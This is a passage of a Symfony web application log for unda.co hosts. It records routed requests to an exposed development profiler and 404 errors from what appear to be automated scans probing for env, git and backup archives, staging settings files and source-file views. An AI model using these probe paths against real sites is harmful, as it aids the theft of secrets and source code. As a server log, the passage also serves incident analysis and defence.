  2736. [2025-12-17 20:11:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2737. [2025-12-17 20:11:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2738. [2025-12-17 20:11:14] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  2739. [2025-12-17 20:14:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=twig","method":"GET"} []
  2740. [2025-12-17 20:14:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2741. [2025-12-17 20:21:22] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  2742. [2025-12-17 20:21:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2743. [2025-12-17 20:21:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2744. [2025-12-17 20:21:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2745. [2025-12-17 20:21:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2746. [2025-12-17 20:21:24] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  2747. [2025-12-17 20:26:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=exception","method":"GET"} []
  2748. [2025-12-17 20:26:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2749. [2025-12-17 20:26:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=time","method":"GET"} []
  2750. [2025-12-17 20:26:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2751. [2025-12-17 20:27:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=request","method":"GET"} []
  2752. [2025-12-17 20:27:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2753. [2025-12-17 20:30:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2754. [2025-12-17 20:33:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=src%2FHona%2FAuthBundle%2FController%2FHomeController.php&line=17","method":"GET"} []
  2755. [2025-12-17 20:36:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemaps.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemaps.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2756. [2025-12-17 20:38:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=security","method":"GET"} []
  2757. [2025-12-17 20:38:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2758. [2025-12-17 20:42:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=exception","method":"GET"} []
  2759. [2025-12-17 20:42:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  2760. [2025-12-17 20:48:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=time","method":"GET"} []
  2761. [2025-12-17 20:48:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  2762. [2025-12-17 20:49:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=request","method":"GET"} []
  2763. [2025-12-17 20:49:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  2764. [2025-12-17 20:50:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=security","method":"GET"} []
  2765. [2025-12-17 20:50:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2766. [2025-12-17 20:58:12] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebServerBundle&line=0","method":"GET"} []
  2767. [2025-12-17 20:58:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f1e7f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f1e7f8?panel=dump","method":"GET"} []
  2768. [2025-12-17 20:58:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  2769. [2025-12-17 21:00:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=config","method":"GET"} []
  2770. [2025-12-17 21:00:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2771. [2025-12-17 21:02:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=dump","method":"GET"} []
  2772. [2025-12-17 21:02:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  2773. [2025-12-17 21:04:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2774. [2025-12-17 21:04:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2775. [2025-12-17 21:04:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2776. [2025-12-17 21:04:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"711f96","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/711f96?panel=config","method":"GET"} []
  2777. [2025-12-17 21:04:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2778. [2025-12-17 21:04:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2779. [2025-12-17 21:04:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2780. [2025-12-17 21:05:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dns-query"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dns-query\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2781. [2025-12-17 21:12:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=cache","method":"GET"} []
  2782. [2025-12-17 21:12:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  2783. [2025-12-17 21:22:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /appsettings.Staging.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /appsettings.Staging.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2784. [2025-12-17 21:23:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  2785. [2025-12-17 21:23:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  2786. [2025-12-17 21:26:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555","method":"GET"} []
  2787. [2025-12-17 21:26:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  2788. [2025-12-17 21:30:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e80d5b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e80d5b?panel=form","method":"GET"} []
  2789. [2025-12-17 21:30:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  2790. [2025-12-17 21:38:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=twig","method":"GET"} []
  2791. [2025-12-17 21:38:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  2792. [2025-12-17 21:48:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=validator","method":"GET"} []
  2793. [2025-12-17 21:48:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  2794. [2025-12-17 21:49:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=security","method":"GET"} []
  2795. [2025-12-17 21:49:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  2796. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2797. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2798. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2799. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2800. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2801. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2802. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2803. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2804. [2025-12-17 21:50:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2805. [2025-12-17 22:00:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=config","method":"GET"} []
  2806. [2025-12-17 22:00:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  2807. [2025-12-17 22:00:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=request","method":"GET"} []
  2808. [2025-12-17 22:00:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
